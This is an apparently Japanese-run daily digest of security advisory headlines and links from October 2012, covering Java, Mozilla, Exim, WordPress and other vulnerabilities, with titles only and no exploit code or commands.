http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00131.html

[SECURITY] [DSA 2566-1] exim4 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00130.html

[security bulletin] HPSBHF02819 SSRT100920 rev.2 - HP, 3COM, and H3C Routers & Switches, Rem
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00129.html

Firefox 16.02 Released
http://isc.sans.edu/diary.html?storyid=14398

Securing the Human Special Webcast - October 30, 2012
http://isc.sans.edu/diary.html?storyid=14392

Cyber Security Awareness Month - Day 26 - Attackers use trusted domain to propagate Citadel Zeus variant
http://isc.sans.edu/diary.html?storyid=14395

Mozilla Thunderbird 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027704

Mozilla Seamonkey 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027703

Mozilla Firefox 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027701

SAP NetWeaver XML External Entity Flaw Lets Remote Users Obtain Files
http://www.securitytracker.com/id/1027700

Xen Doman Builder Size Validation Bug Lets Local Guest Administrators Denial of Service
http://www.securitytracker.com/id/1027699

Wordpress GRAND FlAGallery Plugin Multipe Vulnerabilities
http://secunia.com/advisories/51100/

Xen PV Domain Builder Kernel Decompression Denial of Service Vulnerability
http://secunia.com/advisories/51071/

IP.Board Unspecified Vulnerability
http://secunia.com/advisories/51104/

Drupal MailChimp Module Script Insertion Vulnerability
http://secunia.com/advisories/51061/

Exim DKIM DNS Decoding Buffer Overflow Vulnerability
http://secunia.com/advisories/51098/

Joomla! Freestyle Testimonials Component SQL Injection Vulnerability
http://secunia.com/advisories/51101/

Tiki Wiki CMS/Groupware "unserialize()" PHP Code Execution Vulnerability
http://secunia.com/advisories/51067/

RT RTFM Extension Article Creation Security Bypass Vulnerability
http://secunia.com/advisories/51062/

RT Multiple Vulnerabilities
http://secunia.com/advisories/51065/

IBM WebSphere MQ Multiple Java Vulnerabilities
http://secunia.com/advisories/51080/

IBM InfoSphere Streams Eclipse Help System Vulnerabilities
http://secunia.com/advisories/51073/

SAP NetWeaver XML External Entity Vulnerability
http://secunia.com/advisories/51063/

Ubuntu update for webkit
http://secunia.com/advisories/51070/

WordPress FireStorm Professional Real Estate Plugin "id" SQL Injection Vulnerability
http://secunia.com/advisories/51107/

Seotoaster 1.9 SQL Injection
http://cxsecurity.com/issue/WLB-2011120013

IrfanView TIFF Image Processing Buffer Overflow Vulnerability
http://cxsecurity.com/issue/WLB-2012100241

IrfanView FlashPix PlugIn Double-Free Vulnerability
http://cxsecurity.com/issue/WLB-2012100240

VLC Player 2.0.3 ReadAV Arbitrary Code Execution
http://cxsecurity.com/issue/WLB-2012100083

Google SketchUp 8 Stack Based Buffer Overflow Vulnerability
http://cxsecurity.com/issue/WLB-2012100239

Realplayer Watchfolders long Filepath Overflow
http://cxsecurity.com/issue/WLB-2012100238

NASA Tri-Agency Climate Education (TrACE) 1.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100237

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS
http://cxsecurity.com/issue/WLB-2012100236

WordPress Easy Webinar Blind SQL Injection
http://cxsecurity.com/issue/WLB-2012100235

Aladdin Knowledge System Ltd. Active-X Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100234

Inventory 1.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100233

Inventory 1.0 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100232

Layton Helpbox 4.4.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100231

Layton Helpbox 4.4.0 Authorization Bypass
http://cxsecurity.com/issue/WLB-2012100230

Layton Helpbox 4.4.0 Password Disclosure
http://cxsecurity.com/issue/WLB-2012100229

Layton Helpbox 4.4.0 Stored Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100228

Layton Helpbox 4.4.0 login Bypass
http://cxsecurity.com/issue/WLB-2012100227

Layton Helpbox 4.4.0 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100226

Layton Helpbox 4.4.0 Unencrypted Login
http://cxsecurity.com/issue/WLB-2012100225

Gramophone 0.01b1 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100224

VideoPortalNeu SQL Injection
http://cxsecurity.com/issue/WLB-2011120016

FlirtPortal SQL Injection
http://cxsecurity.com/issue/WLB-2011120008

Social2 SQL Injection
http://cxsecurity.com/issue/WLB-2011120017

Microsoft Office Picture Manager 2010 memory corruption
http://cxsecurity.com/issue/WLB-2012100223

Microsoft Internet Explorer scrollIntoView Use-After-Free
http://cxsecurity.com/issue/WLB-2012100222

Oracle Java Font Processing maxPointCount Heap Overflow
http://cxsecurity.com/issue/WLB-2012100221

Contao 2.11.6 Path Disclosure
http://cxsecurity.com/issue/WLB-2012100220

Oracle Java Font Processing Glyph Element Memory Corruption
http://cxsecurity.com/issue/WLB-2012100219

Bitweaver 2.8.1 Cross Site Scripting & Local File Inclusion
http://cxsecurity.com/issue/WLB-2012100218

Apple QuickTime Player 7.7.2 Crash
http://cxsecurity.com/issue/WLB-2012100217

TIBCO Formvine vulnerability
http://cxsecurity.com/issue/WLB-2012100216

VaM Shop 1.69 Cross Site Scripting & SQL Injection
http://cxsecurity.com/issue/WLB-2012100215

ClanSphere 2011.3 Local File Inclusion & Remote Code Execution
http://cxsecurity.com/issue/WLB-2012100214

WordPress GRAND Flash Album Gallery SQL Injection & Disclosure & File Overwrite
http://cxsecurity.com/issue/WLB-2012100213

Drupal MailChimp 7.x Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100212

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

RT and RT RTFM Extension Security Bypass Vulnerability
http://www.securityfocus.com/bid/56291

Oracle Java SE CVE-2012-3216 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56075

Oracle Java SE CVE-2012-5083 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56025

Oracle Java SE CVE-2012-5073 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56080

Oracle Java SE CVE-2012-1532 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56051

Oracle Java SE CVE-2012-5069 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56065

Oracle Java SE CVE-2012-5068 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56076

Oracle Java SE CVE-2012-5070 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56079

Request Tracker (RT) Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56290

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Oracle Java SE CVE-2012-5079 Remote Security Bypass Vulnerability
http://www.securityfocus.com/bid/56082

Oracle Java SE CVE-2012-5086 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56039

Oracle Java SE CVE-2012-5075 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56081

Oracle Java SE CVE-2012-5077 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56058

Oracle Java SE CVE-2012-1533 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56046

Oracle Java SE CVE-2012-5072 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56083

Oracle Java Virtual Machine (JVM) CVE-2012-4416 Remote Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55501

Oracle Java SE CVE-2012-5067 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56070

Oracle Java SE CVE-2012-1531 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56033

Oracle Java SE CVE-2012-3159 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56072

RETIRED: Apple iPhone/iPad/iPod touch Prior to iOS 6 Multiple Vulnerabilities
http://www.securityfocus.com/bid/55612

Oracle Java SE CVE-2012-1719 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53950

Oracle Java SE CVE-2012-1716 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53947

Oracle Java SE CVE-2012-1718 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53951

Oracle Java SE CVE-2012-1723 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/53960

Oracle Java SE CVE-2012-1713 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/53946

Oracle Java SE CVE-2012-1717 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53952

Oracle Java SE CVE-2012-1725 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53954

Oracle Java SE CVE-2012-1720 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53956

IBM Eclipse Help System Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53884

CoDeSys Unspecified Directory Traversal Vulnerability
http://www.securityfocus.com/bid/56300

HelpBox Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56298

SafeNet Privilege 'PrivAgent.ocx' ActiveX Controls Multiple Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/56297

Inventory Multiple Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56293

Xen PV Domain Builder Kernel Decompression Local Denial Of Service Vulnerability
http://www.securityfocus.com/bid/56289

Perl CVE-2012-5195 Heap-Based Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56287

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

Joomla! Freestyle Testimonials Component Unspecified SQL Injection Vulnerability
http://www.securityfocus.com/bid/56284

Tiki Wiki CMS Groupware 'unserialize()' PHP Code Execution Vulnerability
http://www.securityfocus.com/bid/56282

Inout Article Base 'ViewController.class.php' SQL Injection Vulnerability
http://www.securityfocus.com/bid/56266

26日 金曜日、友引

+ UPDATE: HPSBHF02819 SSRT100920 rev.2 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%25253Demr_na-c03515685%25257CdocLocale%25253Dja_JP&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken

+ マイクロソフト セキュリティ アドバイザリ (2755801) Internet Explorer 10 上の Adobe Flash Player の脆弱性用の更新プログラム
http://technet.microsoft.com/ja-jp/security/advisory/2755801

+ Linux Kernel 'ext4_convert_unwritten_exten()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4508

国内企業・組織の1割で通信隠蔽ソフト「Tor」を確認、パロアルトネットワークス調べ
http://itpro.nikkeibp.co.jp/article/NEWS/20121025/432643/?ST=security

JVNVU#225404 HP/H3C 製および Huawei 製ネットワーク機器にアクセス制限不備の脆弱性
http://jvn.jp/cert/JVNVU225404/

JVNVU#268267 複数の DomainKeys Identified Mail (DKIM) 実装に問題
http://jvn.jp/cert/JVNVU268267/

Wordpress 3.4 Cross-Site Scripting Vulnerability
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00128.html

JVNDB-2012-005124 Zoner AntiVirus Free application for Android における SSL サーバを偽装される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005124.html

JVNDB-2012-005123 WordPress 用 White Label CMS プラグインの wlcms-plugin.php におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005123.html

JVNDB-2012-005122 WordPress 用 White Label CMS プラグインの wlcms-plugin.php におけるクロスサイトリクエストフォージェリの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005122.html

JVNDB-2012-005121 TIBCO Formvine における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005121.html

JVNDB-2012-005120 (JVNVU#160027) 複数の Broadcom 製無線チップセットにサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005120.html

JVNDB-2012-005119 (JVNVU#872545) Adobe Shockwave Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005119.html

JVNDB-2012-005118 (JVNVU#872545) Adobe Shockwave Player における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005118.html

JVNDB-2012-005117 (JVNVU#872545) Adobe Shockwave Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005117.html

JVNDB-2012-005116 (JVNVU#872545) Adobe Shockwave Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005116.html

JVNDB-2012-005115 (JVNVU#872545) Adobe Shockwave Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005115.html

JVNDB-2012-005114 (JVNVU#872545) Adobe Shockwave Player におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005114.html

JVNDB-2012-005113 GNOME gnome-keyring における脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005113.html

JVNDB-2012-005112 rhncfg の Red Hat Network Configuration Client における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005112.html

JVNDB-2012-005111 RazorCMS の admin/index.php におけるクロスサイトリクエストフォージェリの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005111.html

JVNDB-2012-005109 Joomla! の language search コンポーネントにおけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005109.html

JVNDB-2012-005108 ATutor AContent の user/index_inline_editor_submit.php における任意のユーザパスワードを変更される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005108.html

JVNDB-2012-005107 ATutor AContent の user/index_inline_editor_submit.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005107.html

JVNDB-2012-005106 Subrion CMS におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005106.html

JVNDB-2012-005105 ATutor AContent の file_manager/preview_top.php におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005105.html

JVNDB-2012-005104 ATutor AContent における任意のユーザのパスワードまたはカテゴリ名を変更される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005104.html

JVNDB-2012-005103 ATutor AContent における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005103.html

JVNDB-2012-005102 OpenX の admin/campaign-zone-link.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005102.html

JVNDB-2012-005101 OpenX の admin/plugin-index.php におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005101.html

JVNDB-2012-005100 Subrion CMS におけるクロスサイトリクエストフォージェリの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005100.html

JVNDB-2012-005099 Subrion CMS の register/ における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005099.html

JVNDB-2012-005098 Subrion CMS におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005098.html

JVNDB-2012-005097 ibacm における ib_acm デーモンログまたは ibacm.port ファイルを上書きされる脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005097.html

JVNDB-2012-005096 ibacm におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005096.html

JVNDB-2012-005095 librdmacm におけるアプリケーションのアドレス解決情報を設定される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005095.html

JVNDB-2012-005094 libsocialweb における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005094.html

JVNDB-2012-005093 Subrion CMS の admin/index.php における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005093.html

JVNDB-2012-005092 Subrion CMS の poll モジュールにおけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005092.html

JVNDB-2012-005091 libsocialweb における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005091.html

JVNDB-2012-005090 Claws Mail の procmime.c の strchr 関数におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005090.html

JVNDB-2012-005089 gitolite におけるディレクトリトラバーサルの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005089.html

JVNDB-2012-005088 fwknop の client/fwknop.c におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005088.html

JVNDB-2012-005087 fwknop におけるサービス運用妨害 (サーバクラッシュ) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005087.html

JVNDB-2012-005086 OpenStack Object Storage (swift) における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005086.html

Cyber Security Awareness Month - Day 25 - Pro Audio & Video Packets on the Wire
http://isc.sans.edu/diary.html?storyid=14380

Bitweaver Input Validation Flaws Permit Cross-Site Scripting Attacks
http://www.securitytracker.com/id/1027698

WordPress Poll Plugin Multiple SQL Injection Vulnerabilities
http://secunia.com/advisories/50910/

bitweaver Multiple Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51091/

ManageEngine SupportCenter Plus "fromCustomer" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50928/

WordPress FireStorm Professional Real Estate Plugin SQL Injection Vulnerabilities
http://secunia.com/advisories/50873/

phpMyBitTorrent Multiple Vulnerabilities
http://secunia.com/advisories/50829/

Ubuntu update for python3.1
http://secunia.com/advisories/51087/

RETIRED: Apple Mac OS X Security Update 2012-004 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55623

Apple iOS SMS Spoofing Vulnerability
http://www.securityfocus.com/bid/55087

Google Chrome Prior to 17.0.963.83 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52674

Google Chrome Prior to 17.0.963.65 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52271

WebKit Multiple Unspecified Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55534

WebKit Multiple Unspecified Remote Code Execution Vulnerabilities
http://www.securityfocus.com/bid/54680

Google Chrome Prior to 18.0.1025.151 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52913

Google Chrome Prior to 19 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53540

Google Chrome Prior to 18.0.1025.142 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52762

Google Chrome Prior to 18.0.1025.168 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53309

Bitweaver Multiple Cross Site Scripting and Local File Include Vulnerabilities
http://www.securityfocus.com/bid/56230

Oracle Java SE CVE-2012-0547 Remote Java Runtime Environment Weakness
http://www.securityfocus.com/bid/55339

fwknop Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55617

phpMyFAQ 'index.php' Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/43560

Subrion CMS 'username' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/48224

Joomla! 'language search' Component Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/55858

Subrion CMS Multiple Cross Site Scripting and HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/55502

VLC Media Player Read Access Violation Arbitrary Code Execution Vulnerability
http://www.securityfocus.com/bid/55850

Mozilla Firefox/Thunderbird/SeaMonkey 'defaultValue()' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56155

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4191 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56153

Mozilla Firefox/Thunderbird/SeaMonkey Cross Domain Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56154

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4190 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56151

Xen CVE-2012-3515 Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/55413

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1973 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55316

WordPress 'doing_wp_cron' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56263

WordPress Poll Plugin 'wp-admin/admin-ajax.php' Script Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56249

WordPress FireStorm Professional Real Estate Plugin Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56248

Microsoft Office Picture Manager Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56239

Linux Kernel 'ext4_convert_unwritten_exten()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56238

AContent SQL Injection and Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/56237

25日 木曜日、先勝

+ CVE-2008-6536 Unspecified vulnerability in 7-zip
https://blogs.oracle.com/sunsecurity/entry/cve_2008_6536_unspecified_vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6536

+ CVE-2012-5166 Denial of Service vulnerability in ISC BIND
https://blogs.oracle.com/sunsecurity/entry/cve_2012_5166_denial_of
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166

クラウドプレフィルタ 緊急サーバメンテナンスのお知らせ（2012年10月28日）
http://www.trendmicro.co.jp/support/news.asp?id=1856

Advisory: SafeGuard Configuration Protection - a tool to avoid potential issues after upgrading clients running Sophos Anti-Virus has now been released
http://www.sophos.com/en-us/support/knowledgebase/118461.aspx

Advisory: Shh/Updater-B False positives
http://www.sophos.com/en-us/support/knowledgebase/118311.aspx

[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery P
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00126.html

[SECURITY] [DSA 2565-1] iceweasel security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00121.html

HP/H3C and Huawei SNMP Weak Access to Critical Data
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00122.html

[SECURITY] [DSA 2564-1] tinyproxy security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00125.html

[SECURITY] [DSA 2563-1] viewvc security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00123.html

[SECURITY] [DSA 2562-1] cups-pk-helper security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00124.html

VUPEN Security Research - Oracle Java Font Processing Glyph Element Memory Corruption Vulnerabil
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00120.html

VUPEN Security Research - Oracle Java Font Processing "maxPointCount" Heap Overflow Vulnerabilit
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00119.html

VUPEN Security Research - Microsoft Internet Explorer "scrollIntoView" Use-After-Free Vu
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00118.html

VUPEN Security Research - Microsoft Internet Explorer "OnMove" Use-After-Free Vulnerabil
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00117.html

[security bulletin] HPSBUX02824 SSRT100970 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code, and Other Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00116.html

[security bulletin] HPSBHF02819 SSRT100920 rev.1 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00115.html

DC4420 - London DEFCON - October meet - tomorrow, Tuesday 23rd October.
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00114.html

[ MDVSA-2012:168 ] hostapd
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00113.html

[SECURITY] [DSA 2561-1] tiff security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00110.html

VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00112.html

[SECURITY] [DSA 2560-1] bind9 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00109.html

F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00108.html

XSS Vulnerabilities in ClipBucket
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00107.html

XSS Vulnerabilities in CMSMini
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00106.html

XSS Vulnerabilities in TaskFreak
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00105.html

世界のセキュリティ・ラボから
「87654321」というパスワードは強力？
http://itpro.nikkeibp.co.jp/article/COLUMN/20121021/431302/?ST=security

JVNVU#160027 複数の Broadcom 製無線チップセットにサービス運用妨害 (DoS) の脆弱性
http://jvn.jp/cert/JVNVU160027/

JVNVU#872545 Adobe Shockwave Player に複数の脆弱性
http://jvn.jp/cert/JVNVU872545/

Apple Itunes Memory Corruption and Application Crash Remote Vulnerability
http://www.securiteam.com/securitynews/6V0360075O.html

Endpoint Protector Multiple Web Vulnerabilities
http://www.securiteam.com/securitynews/6V03K155PO.html

Cyber Security Awareness Month - Day 24 - A Standard for Information Security Incident Management - ISO 27035
http://isc.sans.edu/diary.html?storyid=14371

3Com, HP, and H3C Switches SNMP Configuration Lets Remote Users Take Administrative Actions
http://www.securitytracker.com/id/1027694

VU#225404 HP/H3C and Huawei networking equipment h3c-user snmp vulnerability
http://www.kb.cert.org/vuls/id/225404

VU#268267 DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust
http://www.kb.cert.org/vuls/id/268267

SUSE update for kernel
http://secunia.com/advisories/51099/

Joomla! Commedia Component "id" SQL Injection Vulnerability
http://secunia.com/advisories/51076/

Ubuntu update for python3.2
http://secunia.com/advisories/51089/

Winmail Server Multiple Script Insertion Vulnerabilities
http://secunia.com/advisories/50631/

WordPress Cimy User Manager Plugin "cimy_um_filename" Arbitrary File Disclosure Vulnerability
http://secunia.com/advisories/50834/

WordPress Spider Calendar Plugin "many_sp_calendar" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50981/

TIBCO Formvine Multiple Unspecified Vulnerabilities
http://secunia.com/advisories/51092/

OpenAthens SP for Java SAML Assertion Signature Validation Vulnerability
http://secunia.com/advisories/51084/

Oracle Solaris BIND Record Handling Lockup Vulnerability
http://secunia.com/advisories/51078/

Debian update for tinyproxy
http://secunia.com/advisories/51074/

Oracle Solaris 7-zip Unspecified Vulnerability
http://secunia.com/advisories/50926/

Liferay Portal Multiple Vulnerabilities
http://secunia.com/advisories/51095/

Debian update for viewvc
http://secunia.com/advisories/51072/

Debian update for iceweasel
http://secunia.com/advisories/50970/

Adobe Shockwave Player Multiple Vulnerabilities
http://secunia.com/advisories/51090/

HP-UX update for BIND
http://secunia.com/advisories/51096/

JetPort 5600 Hardcoded Credentials Security Issue
http://secunia.com/advisories/51083/

IBM AIX BIND Record Handling Lockup Vulnerability
http://secunia.com/advisories/51106/

Microsoft Office Word 2010 Stack Exhaustion
http://cxsecurity.com/issue/WLB-2012100208

Inout Article Base Ultimate 2 Blind SQLi & CSRF
http://cxsecurity.com/issue/WLB-2012100211

ENGINE 3.0 <= SQL Injection
http://cxsecurity.com/issue/WLB-2012100210

zomorrod Web Design SQL Injection Vulnerability
http://cxsecurity.com/issue/WLB-2012100209

REMOTE: Turbo FTP Server 1.30.823 PORT Overflow
http://www.exploit-db.com/exploits/22161

DoS/PoC: Apple QuickTime Player 7.7.2 Crash PoC
http://www.exploit-db.com/exploits/22214

DoS/PoC: Microsoft Office Word 2010 Crash PoC
http://www.exploit-db.com/exploits/22215

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3968 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55276

Mozilla Firefox, SeaMonkey, and Thunderbird CVE-2012-3969 Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55292

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3970 Use-After-Free Memory CorruptionVulnerability
http://www.securityfocus.com/bid/55278

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3962 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55342

